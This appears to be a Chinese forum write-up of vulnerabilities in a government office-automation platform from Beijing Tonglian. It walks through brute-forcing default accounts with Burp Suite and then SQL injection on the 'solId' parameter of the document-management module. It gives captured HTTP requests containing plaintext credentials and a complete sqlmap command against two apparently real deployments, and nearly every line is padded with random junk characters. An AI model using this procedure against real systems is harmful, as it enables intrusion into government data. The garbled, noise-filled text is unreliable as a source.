; V# S4 L. e8 R: R4 [
1 V& ?: r: y3 r/ a' M
0 x! n y% Y; F3 p) j
5 Y. a0 [1 U* f, U: e- _ 平台简介:
" _8 f' U: `: u$ c$ f* |: f : h3 R- \+ r9 a( Q; ^: B$ X4 d
: g9 _4 d7 E" I1 ^% e% M5 k & P& g ?: j4 j5 R k/ D
' ]8 S3 W' K3 F. u4 q1 G* l) ]6 @2 [. T! @6 v- y
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 / Y; t. i* O$ |$ _& ?2 y# d
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 ' z' w( I5 B+ l+ d( D, G/ ~
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!5 c0 W+ s) U [( i
1 c/ V: o/ R& L, e/ H" s) k3 C* p- W7 x% B1 z( v6 a5 v( t7 d/ ~
9 o( n& t9 D* T. m
O2 G7 {5 Q! M/ ^0 X# j
3 z4 m( E* \ b' D- e 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:: R& D" ^% }5 h9 t6 x# H9 f" P
2 L# |, m1 h' I( Z" l8 \. l0 D0 V9 `; @
3 s5 w0 P7 }" P' ~# P $ p; i; p9 H n4 _0 y% M
2 ?5 K) f8 e" g% ?. [7 p$ g http://1.1.1.1:7197/cap-aco/#(案例2-)
* H" I, }. u3 G4 Z( _8 F
# } c# r8 ?$ l8 n" |- Z: \) U! q- Q, ]1 N7 ^! k
http://www.XXOO.com (案例1-官网网站)8 Y! a/ }& f; r) X
- m8 m6 ~8 ?8 g% ?& n- o
+ A4 j/ U0 W: N% H2 i* s
+ S! E* h0 R: V; K/ ]* @
6 k5 j3 I/ ~3 Q' L+ O2 N
3 N% ]/ S+ @5 J! k 漏洞详情:
2 H k' s0 M; b
/ p1 x) O/ Z8 Y k5 J' F! H7 j0 g3 |3 g
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
3 x8 C+ A% g- d) ~ 8 E$ X4 I( l" _) |4 s% y
% V3 [/ \ M/ Y3 z" x
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:# t0 Q5 \3 e! @& X( x) d, o
% a4 h6 J+ G* y6 ^- Z- ^/ r
+ g4 M( Y5 I3 v, I2 O1 z, J
) {6 `' ^1 U: j$ |# L
: w! d9 B* y; l# W
- z7 r3 y8 K4 |' z- {9 `( W
( U+ B: p! _. h* Y
& k# E) N2 U* Y0 [$ @4 ?, U& l/ d% }/ N# z" a6 v( F
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:% P: B; V# I6 ~" j7 W# \. b) @0 z
9 h- z- K: t0 u7 x( I1 S
- }$ ^' b, I- ^% s1 C9 y8 C8 H
1、案例1-官方网站) [. i* Y) Z+ E( I. U* ]4 z
/ l; c% z# K' Y3 ^
3 S j( C- _# T9 z1 R, X7 f GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
# m8 X, x0 Q* m7 [5 ^
* z0 O+ v/ _& z" U# |$ } b; W3 J+ U, Z$ U% Z8 l$ a( O! K
Host: www.XXOO.com
: K+ O! d) }( D8 X1 [ ' k8 H, u* Z; M! {1 J& s
) W' B# q; D$ q" }; A Proxy-Connection: Keep-Alive
" E: r3 l3 Z# d! k$ L- y8 i ' D! k6 N% r3 g+ d- q. K; ]/ k% I, C
0 H: a- m+ {# S' {9 i. o/ K% X Accept: application/json, text/javascript, */*; q=0.01
7 T& z* M8 j; n/ p/ B6 y7 F 1 u) `. K( q: L9 |. Y# y
5 ^. J- V2 w$ h$ o1 {1 y$ t
Accept-Language: zh-CN$ A( o# W1 p7 w6 ~& S6 }/ s. e# z
" j; k/ J* R# S* X6 } }9 e
) F9 e l. s) f7 M Content-Type: application/json
6 e5 x4 v: b) O9 v. f2 x, C- B" `7 ~' t , |, L3 p# k h( `# t% O
2 i# a0 U! X B9 j1 m6 J6 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko2 d: l" G" x+ N
I1 x3 g( S# O5 H$ Q
8 a+ z0 E, e) w* [6 H+ r
X-Requested-With: XMLHttpRequest
5 Y6 g: v# q& U8 n1 n
/ n8 b) R8 M9 b& @; ~4 l( Z: u4 q6 K
. c/ s4 W. o; P' l3 p Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002) {6 y9 J- M- R' D* M; U
2 o5 g6 o9 F3 }; d( Q- T4 J
. |$ x9 v: T. H# ^5 Y5 a
Accept-Encoding: gzip, deflate, sdch
Y# J, v. l, R& U0 A5 E
. z5 F8 ]6 Q* `8 Y4 E1 t& [
- E; Q% O Q7 i- J g Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
8 W; B1 g% R- J) | @4 X ' `# y$ H+ V. q
3 |: d, W) H) f4 u5 A1 I* L
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 j! a* E1 O4 ~3 ~; Q
6 i# a, Z! A6 K X W
# Z: ?6 Q8 g1 J
' k# A2 {+ h$ P& w1 y1 H4 ^ 0 z! u7 |% R2 j# E: M
, H5 }: q' _* {1 I9 h+ v# C1 \$ y
) G4 e+ `" A u1 l- o* E
! g d& ]& F. t: a/ Q, y+ v F
/ g" L( |7 J" }/ f
* o) }" E' @( {5 w, e3 m6 ^' w; j
8 a; H) l" i a2 `" v+ a4 q% D7 B/ p. }/ J+ K6 q
. M& _+ y& [. c/ c8 M4 D
; b4 @ T [3 A, U2 d f
; {1 f9 q4 Q/ X& S& n
$ c6 X R# Q9 Q$ m( N' J ( Y* N7 C E; s4 ?
4 M. L+ P; d& s 2、案例2-某天河云平台$ F( j! O4 t% b
$ j* }& ^" p* a. \) {& n- n& [
3 {7 [" T1 s0 g. }7 J8 x GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
- p2 u/ K( x6 }" E
# }( C- `+ D% j6 j- F8 ]/ I+ P" E9 B+ E7 A! v
Host: 1.1.1.:7197
: r; i% n' I) W5 @6 D
+ c0 `) s1 |$ Q
* A+ {1 }* e# m G7 P1 t Accept: application/json, text/javascript, */*; q=0.015 w# t+ q' Q6 M; M. |( v$ b: N
( ~+ f/ b% r$ u
9 A v% R w9 I+ P& P X-Requested-With: XMLHttpRequest
! @- c; o8 \2 M, O. G/ Y ) k. j L/ L1 s7 b
) n: G$ B' y2 r# S. D! T- V
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0: _: M. Z: S; O2 E
/ T4 n) o, H; R6 P; ~3 [+ w9 x6 N s
Content-Type: application/json
" J. H2 x x* m* d9 B , T! T. Z/ I4 l3 [7 L
3 e$ N- O0 E1 l1 p. A- g Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
0 S V/ x+ _7 l b+ c
4 a$ b& v7 G* o! w8 x2 I) v+ a4 r5 o8 M# Y& U$ M
Accept-Language: zh-CN,zh;q=0.8- Q* o8 j Q& p. k; O
2 Q3 c' h" I$ x! G, O
6 n# q) _6 c) b% T. [4 u Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=11 }: c- H7 h G, I0 U7 s
9 z1 \/ x6 Q& n2 ]- D: u5 F; F9 {2 t+ r' _) z
Connection: close' B( p& P0 Z& p' I3 l
$ [) ?$ _0 Q: z& F; z" w
5 }" F* c: [6 L2 K. ?8 ^
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
+ C" t7 t9 Z6 J2 r0 p- v i9 Y3 l$ N3 s ) }# L1 C- ?. U2 a; X% T! g' L
( H& t- R3 a4 a$ w0 D5 B' @
2 J; C) }8 \2 R0 ? r3 o
+ X; K9 r/ X: P) O
! B3 }& n# D# D; J7 p' }7 Z. s
6 ?/ A/ Q. a8 Q8 M3 z1 w |